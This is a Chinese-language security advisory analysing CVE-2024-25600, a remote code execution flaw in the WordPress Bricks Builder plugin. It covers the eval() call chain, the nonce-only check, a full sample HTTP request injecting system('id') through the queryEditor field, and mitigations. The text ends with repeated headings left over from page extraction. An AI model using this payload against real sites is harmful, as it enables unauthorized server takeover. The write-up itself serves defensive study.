WordPress Bricks Builder 远程代码执行漏洞分析 (CVE-2024-25600)<\/h1>

漏洞概述<\/h2>
CVE-2024-25600 是 WordPress Bricks Builder 插件中的一个高危远程代码执行漏洞，影响版本为 1.9.1 至 1.9.6。该漏洞允许攻击者通过构造恶意请求在前台执行任意 PHP 代码，导致完全控制网站服务器。<\/p>

漏洞影响<\/h2>

影响版本<\/strong>: 1.9.1 ≤ Bricks Builder ≤ 1.9.6<\/li>
漏洞类型<\/strong>: 远程代码执行 (RCE)<\/li>
攻击复杂度<\/strong>: 低<\/li>
权限要求<\/strong>: 无 (前台利用)<\/li>

CVSS 评分<\/strong>: 9.8 (Critical)<\/li> <\/ul>
漏洞成因<\/h2>
漏洞主要由三个关键因素共同导致：<\/p>

危险函数调用<\/strong>: 插件中直接使用 eval()<\/code> 执行用户可控输入<\/li>
权限校验不足<\/strong>: 仅依赖 WordPress nonce 进行校验，而 nonce 可从前端获取<\/li>
输入控制不严<\/strong>: 用户输入未经充分过滤直接进入危险函数<\/li> <\/ol> 技术细节分析<\/h2> 1. 危险函数调用链<\/h3> 漏洞最终触发点在 eval()<\/code> 函数执行攻击者可控的 $php_query_raw<\/code> 参数：<\/p> eval<\/span>( "return <\/span>$php_query_raw<\/span>;"<\/span> ); <\/span><\/span><\/code><\/pre>$php_query_raw<\/code> 的值来源于：<\/p> $php_query_raw =<\/span> bricks_render_dynamic_data<\/span>( $query_vars['queryEditor'<\/span>], $post_id ); <\/span><\/span><\/code><\/pre>2. 用户输入传递路径<\/h3> 攻击者输入通过以下路径传递到危险函数：<\/p> 通过 REST API 端点 \/wp-json\/bricks\/v1\/render_element<\/code> 发送请求<\/li> 请求中的 element.settings.query.queryEditor<\/code> 参数被处理<\/li> 经过 prepare_query_vars_from_settings()<\/code> 函数处理<\/li> 通过 bricks_render_dynamic_data()<\/code> 函数处理<\/li> 最终到达 eval()<\/code> 函数<\/li> <\/ol> 3. 关键代码逻辑<\/h3> bricks_render_dynamic_data()<\/code> 函数分析<\/h4> 该函数对输入的处理逻辑如下：<\/p> 如果输入是数组且非空，直接返回第一个元素<\/li> 如果输入包含 name<\/code> 键且非空，返回其值<\/li> 如果输入不包含 {<\/code> 字符，直接返回<\/li> 如果包含 {echo:<\/code> 字符串，去除转义反斜线<\/li> 最终通过 apply_filters<\/code> 处理返回<\/li> <\/ol> 类实例化漏洞点<\/h4> 关键漏洞触发路径涉及动态类实例化：<\/p> new<\/span> $element_class_name( $element ) <\/span><\/span><\/code><\/pre>攻击者可通过控制 $element_class_name<\/code> 和 $element<\/code> 参数，最终触发 Query<\/code> 类的实例化，进而调用危险函数。<\/p> 4. 权限绕过问题<\/h3> 漏洞利用仅需满足以下条件：<\/p> 有效的 nonce 值（可从页面源码获取）<\/li> 构造符合要求的 REST API 请求<\/li> <\/ul> WordPress 官方文档明确指出 nonce 不应作为权限验证的唯一依据，但插件仅依赖 nonce 校验导致了权限绕过。<\/p> 漏洞利用<\/h2> 利用条件<\/h3> 目标站点使用 Bricks Builder 插件 1.9.1-1.9.6 版本<\/li> 能够获取有效的 nonce 值（可从页面源码获取）<\/li> <\/ol> 利用步骤<\/h3> 从目标站点页面源码中获取有效的 nonce 值<\/li> 构造恶意 POST 请求发送到 \/wp-json\/bricks\/v1\/render_element<\/code> 端点<\/li> 在 queryEditor<\/code> 参数中插入恶意 PHP 代码<\/li> <\/ol> 示例攻击载荷<\/h3> POST<\/span> \/WordPress-6.4.3\/wp-json\/bricks\/v1\/render_element HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/json<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "postId"<\/span>: "1"<\/span>, <\/span><\/span> "nonce"<\/span>: "a980a714d9"<\/span>, <\/span><\/span> "element"<\/span>: { <\/span><\/span> "name"<\/span>: "container"<\/span>, <\/span><\/span> "settings"<\/span>: { <\/span><\/span> "hasLoop"<\/span>: ""<\/span>, <\/span><\/span> "query"<\/span>: { <\/span><\/span> "useQueryEditor"<\/span>: ""<\/span>, <\/span><\/span> "queryEditor"<\/span>: "system('id');"<\/span>, <\/span><\/span> "objectType"<\/span>: ""<\/span> <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>修复方案<\/h2> 升级插件<\/strong>: 升级到 Bricks Builder 1.9.6 以上版本<\/li> 临时缓解措施<\/strong>: 禁用 Bricks Builder 插件<\/li> 限制访问 \/wp-json\/bricks\/v1\/<\/code> 路径<\/li> 使用 WAF 规则拦截可疑请求<\/li> <\/ul> <\/li> <\/ol> 漏洞挖掘启示<\/h2> 危险函数审计<\/strong>: 关注 eval()<\/code>、system()<\/code> 等危险函数的使用<\/li> 输入源追踪<\/strong>: 完整追踪用户输入从入口到危险函数的路径<\/li> 权限校验审查<\/strong>: 检查所有敏感操作的权限校验是否充分<\/li> 动态代码执行风险<\/strong>: 特别注意动态类\/方法调用等灵活但危险的特性<\/li> <\/ol> 时间线<\/h2> 漏洞发现: 2024年初<\/li> 漏洞修复: Bricks Builder 1.9.6+<\/li> CVE分配: CVE-2024-25600<\/li> <\/ul> 参考资源<\/h2> Bricks Builder 官方更新日志<\/li> WordPress 官方安全建议<\/li> CVE 官方数据库记录<\/li> <\/ol> 该文档全面分析了 CVE-2024-25600 漏洞的技术细节、利用方式和防御措施，可作为安全研究和防护工作的参考。实际测试或利用时请确保获得合法授权，遵守相关法律法规。<\/p>

WordPress Bricks Builder 远程代码执行漏洞分析 (CVE-2024-25600)<\/h1>

漏洞概述<\/h2> CVE-2024-25600 是 WordPress Bricks Builder 插件中的一个高危远程代码执行漏洞，影响版本为 1.9.1 至 1.9.6。该漏洞允许攻击者通过构造恶意请求在前台执行任意 PHP 代码，导致完全控制网站服务器。<\/p>

技术细节分析<\/h2>

3. 关键代码逻辑<\/h3>

漏洞利用<\/h2>

漏洞概述<\/h2>
CVE-2024-25600 是 WordPress Bricks Builder 插件中的一个高危远程代码执行漏洞，影响版本为 1.9.1 至 1.9.6。该漏洞允许攻击者通过构造恶意请求在前台执行任意 PHP 代码，导致完全控制网站服务器。<\/p>